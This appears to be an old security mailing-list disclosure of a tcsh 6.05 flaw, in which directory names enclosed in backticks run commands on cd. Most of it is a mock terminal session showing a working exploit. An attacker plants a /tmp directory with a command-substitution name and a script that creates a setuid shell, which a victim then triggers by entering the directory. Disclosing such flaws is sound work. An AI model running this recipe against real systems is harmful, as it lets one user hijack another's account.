tee see shell problems

[butafuco () mc net (test)]

A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway.) that allows the execution of arbitrary commands
when changing into directories that are enclosed with back tic's.  The
problem might also prove to be quite bad to tcsh scripts that find
themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to
exploit this weakness.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ

---------------------------Cut to unsuspecting foo------------------------

jim% whoami
Unsuspecting foo
jim% echo $SHELL
/bin/tcsh
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls

`source .WaReZ`

jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls

jim% oh, oh well maybe I'll check later...
jim% cd $HOME

----------------------------Cut to More Bad guy--------------------------

jim% ls -a /tmp/*W*/

.
..
.24753

jim% /tmp/*W*/.24753
$whoami
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------